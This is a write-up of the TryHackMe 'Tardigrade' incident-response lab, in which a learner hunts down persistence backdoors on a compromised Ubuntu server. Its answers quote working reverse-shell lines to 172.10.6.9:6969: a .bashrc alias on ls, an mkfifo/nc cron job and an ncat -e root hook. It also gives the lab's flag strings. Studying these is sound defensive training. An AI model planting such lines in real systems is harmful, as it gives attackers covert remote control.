Tardigrade
TryHackMe Challenge Walkthrough
Challenge Overview
A server has been compromised, and the security team has decided to isolate the machine until it’s been thoroughly cleaned up. Initial checks by the Incident Response team revealed that there are five different backdoors. It’s your job to find and remediate them before giving the signal to bring the server back to production.
Q & A
Q1 What is the server's OS version?
Let’;s start connecting with SSH to the server
Answer
Ubuntu 20.04.4 LTS
Q2 What's the most interesting file you found in giorgio's home directory?
I would say that anything starting with .bad can be interesting or at least a red flag
Answer
.bad_bash
Q3 Another file that can be found in every user's home directory is the .bashrc file. Can you check if you can find something interesting in giorgio's .bashrc?
let’s open the .bashrc file and check it
bash:
nano .bashrc
description
Answer
ls='(bash -i >& /dev/tcp/172.10.6.9/6969 0>&1 & disown) 2>/dev/null; ls –color=auto’
Q4 It seems we've covered the usual bases in giorgio's home directory, so it's time to check the scheduled tasks that he owns. Did you find anything interesting about scheduled tasks?
Answer
/usr/bin/rm /tmp/f;/usr/bin/mkfifo /tmp/f;/usr/bin/cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 172.10.6.9 6969 >/tmp/f
Q5 This section is a bonus discussion on the importance of a dirty wordlist. Accept the extra point and happy hunting!
Answer
THM{d1rty_w0rdl1st}
Q6 A few moments after logging on to the root account, you find an error message in your terminal. What does it say?
Answer
Ncat: TIMEOUT.
Q7 After moving forward with the error message, a suspicious command appears in the terminal as part of the error message. What command was displayed?
Answer
ncat -e /bin/bash 172.10.6.9 6969
Q8 Can you find out how the suspicious command has been implemented?
Answer
.bashrc
Q9 What is the last persistence mechanism?
check etc/passw to see which users are on the system
Answer
nobody
Q10 The adversary left a golden nugget of "advise" somewhere. What is the nugget?
From the precedent question we know that our bro nobody owns a /nonexistent folder.
Lets see what he has inside it, we find a file .youfoundme and i guess just cat and we find our flag
Answer
THM{Nob0dy_1s_s@f3}
Conclusion
Sometimes, adversaries don’t need malware — just a few cron jobs, a backdoored .bashrc, and a creative alias. This challenge was a reminder that persistence isn’t always fancy… it’s often just hiding in plain sight.
$ Whoami
Cybersecurity learner, log nerd, and TryHackMe badge hoarder. Let’s connect on LinkedIn before I get pulled into another packet capture.